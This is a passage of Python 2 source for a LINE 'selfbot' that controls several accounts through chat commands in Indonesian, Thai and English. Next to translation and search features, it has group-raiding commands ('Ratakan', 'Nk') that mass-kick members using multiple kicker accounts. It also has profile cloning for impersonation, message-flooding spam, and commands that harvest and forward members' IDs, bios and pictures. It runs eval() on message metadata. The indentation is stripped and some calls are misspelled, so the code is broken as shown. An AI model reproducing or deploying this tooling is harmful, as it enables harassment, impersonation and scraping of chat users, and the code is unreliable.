wait["message"] = msg.text.replace("Pesan add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kami mengubah pesan🛡")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message Confirmation"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis👈")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia👈")
elif "Message set: " in msg.text:
c = msg.text.replace("Message set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Is a string that can not be changed👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"This has been changed👈\n\n" + c)
elif "Comment set: " in msg.text:
c = msg.text.replace("Comment set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah👈\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di👈")
else:
cl.sendText(msg.to,"To open👈")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"オンã«ã—ã¾ã—ãŸ👈")
else:
cl.sendText(msg.to,"è¦äº†å¼€👈")
elif msg.text in ["Com off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off")
else:
cl.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"To turn off")
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:👈\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklistô€œô€…”👈")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklistô€œô€…”👈")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklistô€œ🛡")
else:
cl.sendText(msg.to,"The following is a blacklistô€œ👈")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"👉Jam on👈")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Hal ini sudah off🛡")
else:
wait["clock"] = False
cl.sendText(msg.to,"Adalah Off")
elif "Jam say: " in msg.text:
n = msg.text.replace("Jam say: ","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Ini telah diubah🛡\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui👈")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Nama")
elif msg.text in ["Point","นับ"]:
if msg.toType == 2:
cl.sendText(msg.to, "ตั้งจุดเช็คคนอ่าน:" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S'))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text in ["Read","อ่าน"]:
if msg.toType == 2:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "==============================\nActive readers:%s\n\n\n\nPassive readers:\n%s\n\n==============================\nIn the last seen point:\n[%s]\n==============================\n Powered By: kieselfbotline" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "ReadPoint Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait
cl.sendText(msg.to, "Auto set reading point in:" + datetime.now().strftime('\n📅%Y-%m-%d 🕛 %H:%M:%S'))
else:
cl.sendText(msg.to, "Reading point has not been set.")
#-----------------------[Add Staff Section]------------------------
elif "Add staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if staff == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Staff list: ")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------------------------------------------
elif msg.text in ["Group creator","Gc","Gcreator","gcreator"]:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': gCreator}
cl.sendMessage(msg)
cl.sendText(msg.to,"""╔══════════════
💥ผู้สร้างกลุ่ม Creator 💥Group""")
#staff-----------------------------------------------------------
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"💗ชื่อ💗 :\n" + contact.displayName + "\n\n💗สเตตัส💗 :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
#----------------------------------------------------
elif "Mycopy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
#=================================================
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#-------------------------------- PP BY TAG ---------------------------------
elif "Lo @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("Cover @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.channel.getHome(target)
objId = h["result"]["homeInfo"]["objectId"]
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/myhome/c/download.nhn?userid=" + target + "&oid=" + objId)
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif "pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
xname = cl.getContact(msg.from_).displayName
cl.sendText(msg.to,"Kepo Kaka Yaa "+xname+"\n (`・ω・´)\n \n" + datetime.now().strftime('%H:%M:%S'))
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif "Pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("Pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif msg.text.lower() in ["pap owner","pap creator"]:
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/0hQHBfiuxIDmd_HyI5amNxMENaAAoIMQgvBywTVFNIAgRTLk9kRHBCAlkcAFMGKkBiS3hAUQgbBVFU")
#----------------------------------------------------------------------
elif msg.text in ["Rejectall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Completion。")
ki.sendText(msg.to,"Completion。")
ki2.sendText(msg.to,"Completion。")
ki3.sendText(msg.to,"Completion。")
ki4.sendText(msg.to,"Completion。")
ki5.sendText(msg.to,"💟ทำการลบห้องรันหมดแล้ว💟")
else:
cl.sendText(msg.to,"key is wrong。")
#----------------------------------------------------------------
elif msg.text in ["Reject","ลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฏิเสทคำเชิญเข้ากลุ่มทั้งหมดเรียบร้อย")
else:
cl.sendText(msg.to,"key is wrong")
elif msg.text in ["Reject1","ลบรัน1"]:
gid = ki.getGroupIdsInvited()
for i in gid:
ki.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"ปฏิเสทค้างเชิญเรียบร้อย")
else:
ki.sendText(msg.to,"key is wrong")
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=========================================
elif "Say " in msg.text:
string = msg.text.replace("Say ","")
if len(string.decode('utf-8')) <= 50:
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
#-----------------------------------------------
elif "vdo:" in msg.text.lower():
if msg.toType == 2:
query = msg.text.split(":")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Youtube ' in msg.text:
try:
textToSearch = (msg.text).replace('Youtube ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
#==================================================
elif msg.text in ["ทีมงาน","ทีมทดลองบอท"]:
msg.contentType = 13
cl.sendText(msg.to, "[SELFBOT PHET HACK BOT]\n\n[☢Ŧ€₳M≈ನန้ণএ≈฿❂Ŧ☢]\n[By.ทีมงานทีมทดลองบอท]")
cl.sendText(msg.to, "ผู้จัดการทีมงาน:kielovebot")
msg.contentMetadata = {'mid': 'uca51afa767df87ba3705494b97c3355c'}
cl.sendMessage(msg)
#=====================================================
#-----------------------------------------------
#==================================================
#=====================================================
#=================================================================================
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Inggris----\n" + "" + result)
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Inggris----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Thailand----\n" + "" + result)
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Thailand----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif msg.text in ["Friendlist"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═�����═══════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
cl.sendText(msg.to, msgs)
#=========================================
elif msg.text in ["Mimic on","mimic on"]:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic:off"]:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list"]:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#=======================================
#========================================
elif "Nk " in msg.text:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
Ki5.kickuotFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
Ki5.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
Cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
Cl.updateGroup(gs)
#----------------------------------------------------
elif msg.text in ["Aslogin","ขอลิ้ง"]:
if LINETCRLogged == False:
ki.login(qr=True)
ki.loginResult()
user2 = ki.getProfile().mid
LINETCRLogged = True
cl.sendText(msg.to,"ล็อคอินสำเร็จ Asul พร้อมใช้งานแล้ว")
else:
cl.sendText(msg.to,"Asul ได้ทำการล็อคอินไปแล้ว")
elif msg.text.lower() == ".":
gs = []
try:
gs = cl.getGroup(msg.to).members
except:
try:
gs = cl.getRoom(msg.to).contacts
except:
pass
tlist = ""
for i in gs:
tlist = tlist+i.displayName+" "+i.mid+"\n\n"
if LINETCRLogged == True:
try:
ki.sendText(user1,tlist)
except:
ki.new_post(tlist)
else:
cl.sendText(msg.to,"Asul ยังไม่ได้ล็อคอิน")
#-----------------------------------------------------------)
elif msg.text in ["Help2","Key","KEY"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage2)
else:
cl.sendText(msg.to,help)
#----------------------ADMIN COMMAND------------------------------#
elif ("Kick " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Kick1 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Kick5 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["Mention","Tagall"]:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
elif "Ratakan" in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Ratakan","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("all","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Sukses Bosqu")
cl.sendText(msg.to,"masih mauko sundala")
elif msg.text in ["List grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = "===[List Groups]==="
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = cl.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h += "\n[" + groups.name + "] ->(" + members +")\n -+GroupID : " + i
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h + "\n|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
j = "===[List Groups Invited]==="
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j += "\n[" + groups.name + "] ->(" + members + ")\n -+GroupID : " + i
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j + "\n|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif msg.text in ["Info grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
cl.sendText(msg.to,"===[List Details Group]===")
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = ki.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h)
cl.sendText(msg.to,"|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
cl.sendText(msg.to,"===[List Details Groups Invited]===")
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j)
cl.sendText(msg.to,"|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif "Details grup: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/DetailsGroup: ","")
if gid in [""," "]:
cl.sendText(msg.to,"Grup id tidak valid")
else:
try:
groups = cl.getGroup(gid)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + gid + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName + "\n -+GroupPicture : http://dl.profile.line.naver.jp/" + groups.pictureStatus
cl.sendText(msg.to,h)
except Exception as error:
cl.sendText(msg.to,(error))
elif "Cancel invite: " in msg.text:
if msg.from_ in admin:
gids = msg.text.replace("Cancel invite: ","")
gid = cl.getGroup(gids)
for i in gid:
if i is not None:
try:
cl.rejectGroupInvitation(i)
except:
cl.sendText(msg.to,"Error!")
break
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil tolak undangan dari grup " + gid.name)
else:
cl.sendText(msg.to,"Grup tidak ditemukan")
elif msg.text in ["Accept invite"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
_list = ""
for i in gid:
if i is not None:
gids = cl.getGroup(i)
_list += gids.name
cl.acceptGroupInvitation(i)
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil terima semua undangan dari grup :\n" + _list)
else:
cl.sendText(msg.to,"Tidak ada grup yang tertunda saat ini")
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio" + string)
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio" + string)
elif ("Gname: " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
